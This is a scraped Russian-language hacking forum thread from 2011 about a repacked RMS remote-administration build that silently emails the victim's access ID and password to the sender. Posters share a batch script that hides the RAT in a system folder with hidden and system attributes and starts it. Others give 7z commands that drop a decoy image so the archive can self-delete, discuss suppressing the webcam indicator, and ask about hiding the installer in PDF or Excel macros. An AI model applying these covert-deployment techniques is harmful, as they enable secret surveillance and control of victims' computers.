RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. @patron@
    @patron@ Guest

что значит бесит мне прпосто интересно а вообще мне посрать на бету я и так хорошо работаю с 5.0 и видеонаблюдение тоже сам могу убрать и процес поменять а по части рат это вообще отдельный случай

а если ты не умеешь обяснять и помогать то и не кричи !!! нафиг такие панты что тебя уже бесят моль ты всё знаешь и крутой чувак ну чё поздравляю тебя с этим

Последнее редактирование модератором: 12 окт 2011
    12 окт 2011
  2. damirtm58n
    damirtm58n Новичок
    Симпатии:
    0
    В каком файле при конфигурации сохраняются настройки для отправки пароля на почту, и возможно применить этот метод для SFX сборки?

Добавлено через 9 минут
    И можно ли запускать rutserv как сервис, используя утилиты для запуска программ как сервис, например CronNT?

Последнее редактирование: 12 окт 2011
    12 окт 2011
  3. A-L-I-E-N
    A-L-I-E-N Новичок
    Симпатии:
    5
    Приветствую Уважаемые!

Такая идея... Процесс установки начинается ведь с файла install.bat? Ни так ли?
    Так не прописать нам случаем в этом "бат" файле, в начале, удаление всех и всего из файлов и папок с новым RMS прежде, чем запуститься установка нового? Как считаете? Возможно ли такое осуществить?

12 окт 2011
  4. scarabey
    scarabey Новичок
    Симпатии:
    1
    установленный RMS при запуске итак удаляется,прописано ж в install.cmd,зачем еще в bat писать?

12 окт 2011
  5. A-L-I-E-N
    A-L-I-E-N Новичок
    Симпатии:
    5
    Каком install.cmd? Вроде, только install.bat в архиве нашелся. Быть может, ты спутал расширение файла по привычке и схожести с аналогией cmd команд =)

Просто, читал здесь выше, будто при установке сборки заново(когда юзер в непонятках от чего файлик присланный на почту удалился вдруг, пытается запустить его вновь) - тут появляется окно с предупреждением об удалении RMS. Так, как в этом случае, он удаляется через uninstall самого RMS. Вот и предположил актуальность данного решения.

13 окт 2011
  6. scarabey
    scarabey Новичок
    Симпатии:
    1
    Да нет,ничего я не путаю,читайте внимательно ТС
    И сами других не путайте ;)

13 окт 2011
    1 человеку нравится это.
  7. TDI
    TDI Новичок
    Симпатии:
    32
    тебе влом скачать посмотреть патч ну штоб набить тут постов тупимы вопросами ето норм ? вчера тут было 6 страниц, так тяжело прочитать?

13 окт 2011
  8. Rjcnz
    Rjcnz Новичок
    Симпатии:
    0
    Есть проблема, помогите решить. Можно ли прописать в батнике команду выгружать входящую в сборку картинку в каталог (!) нахождения exeшника. Перепробывал огромное количество команд, пока не получается.

13 окт 2011
  9. TDI
    TDI Новичок
    Симпатии:
    32
    ты хочеш штоб батник закинул тебе картинку в папку где будет RMS, а сама картинка будет в архиве с RMS ?

13 окт 2011
  10. Rjcnz
    Rjcnz Новичок
    Симпатии:
    0
    Да, ты правильно меня понял. Но проблема в том, что жертва может сохранить его в любое место. А команду извлечения картинки в текущий каталог я прописать не смог, не хватает моих знаний.

13 окт 2011
  11. TDI
    TDI Новичок
    Симпатии:
    32
    в install.bat мб дописать
    Код:
    @echo off

mkdir %systemroot%\system32\sysfiles

copy /y "RMS.exe" "%SystemRoot%\system32\sysfiles\RMS.exe"
     copy /y "назва картинки" куда

attrib +s +h +r "%SystemRoot%/system32/sysfiles/RMS.exe"

cd %SystemRoot%\system32\sysfiles
     start RMS.exe

exit

13 окт 2011
  12. Rjcnz
    Rjcnz Новичок
    Симпатии:
    0
    В этом то и проблема. copy /y "назва картинки" куда

Куда копировать я прописать могу, но нужна универсальная команда "ИЗВЛЕЧЕНИЕ В ТЕКУЩИЙ КАТАЛОГ".
    И эта команда должна срабатывать на любую папку, куда бы ни копировала жертва скаченный файл. И я сознательно не могу прописать путь, т.к. не знаю куда файл будет сохранен. Может еще будут какие варианты команды?

13 окт 2011
  13. vlader
    vlader Guest
    У тебя картинка должна быть в папке с архивом?

13 окт 2011
  14. damirtm58n
    damirtm58n Новичок
    Симпатии:
    0
    Если "ИЗВЛЕЧЕНИЕ В ТЕКУЩИЙ КАТАЛОГ" из sfx? то используй консольный архиватор 7z
    команда- 7z e archive.exe Black.jpg -y (в сборку включить файлы архиватора 7z.exe и 7z.dll)

Добавлено через 16 минут
    Кто протестировал пропатченный от баннера веб камеры файлы rfusclient и rutserv???
    Я протестировал и результат не включается камера с этими файлами

Последнее редактирование: 13 окт 2011
    13 окт 2011
  15. Rjcnz
    Rjcnz Новичок
    Симпатии:
    0
    Да, картинка после распаковки из архива должна оказаться в той же папке, что и сам архив, после чего он самоудалится.

Добавлено через 6 минут
    Кто-нибудь пробывал такое прописать? У меня не получилось, выдает ошибку 100.

Есть еще какие варианты? Поделитесь, если получилось реализовать

Последнее редактирование: 14 окт 2011
    14 окт 2011
  16. vlader
    vlader Guest
    на форуме слеши фильтруются.
    Код:
    7z -e archive.exe Black.jpg -y
    Добавлено через 1 минуту
    У тебя куда архив распаковывает?

Последнее редактирование модератором: 14 окт 2011
    14 окт 2011
  17. Rjcnz
    Rjcnz Новичок
    Симпатии:
    0
    Ты мне скажи, а у тебя то что ты рекомендуешь выполняет те функции, о которых я просил? Убил 2 часа, но результат - ноль.

Неужели нет универсальной команды "Извлечь в текущий архив" (место нахождения нашего архива)???

14 окт 2011
  18. damirtm58n
    damirtm58n Новичок
    Симпатии:
    0
    У меня эта команда работает, просто должны быть рядом ещё 2 файла архиватора 7z.exe и 7z.dll а команда правильная (7z.exe e archive.exe Black.jpg -y)

Добавлено через 4 минуты
    7z.exe e archive.exe Black.jpg -y (7z.exe архиватор, e ключ извлечения, archive.exe архив с картинкой, Black.jpg картинка которую нужно извлечь, -y отключение запросов)

Добавлено через 4 минуты
    Кто нибудь протестировал пропатченный от баннера веб камеры файлы rfusclient и rutserv???
    Я протестировал и результат не включается камера с этими файлами!!!
    [/B][/B]

Последнее редактирование: 14 окт 2011
    14 окт 2011
  19. Emelia
    Emelia Новичок
    Симпатии:
    0
    Во первых огромное спасибо автору!!!Долго искал!сам я новичек.Подскажите можно ли осуществить следующую идею..надо setup.exe или уже sfx архив запихнуть в пдф формат или эксель...чтобы при открытии их автоматически запускалась установка?я слышал это делают с помощью макросов(извените если ошибся).

31 окт 2011
  20. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    152
    Emelia,Я потер вашу тему,не надо дублировать вопрос по всему форуму,спросили один раз - ждите пока ответят.

31 окт 2011
Статус темы:
Закрыта.
Загрузка...